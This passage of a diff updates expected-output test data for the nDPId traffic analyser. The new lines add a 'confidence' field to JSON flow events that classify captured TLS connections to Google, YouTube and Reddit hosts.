-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="}
-00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="}
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00953{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00977{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00987{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="}
-00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00974{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01244{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
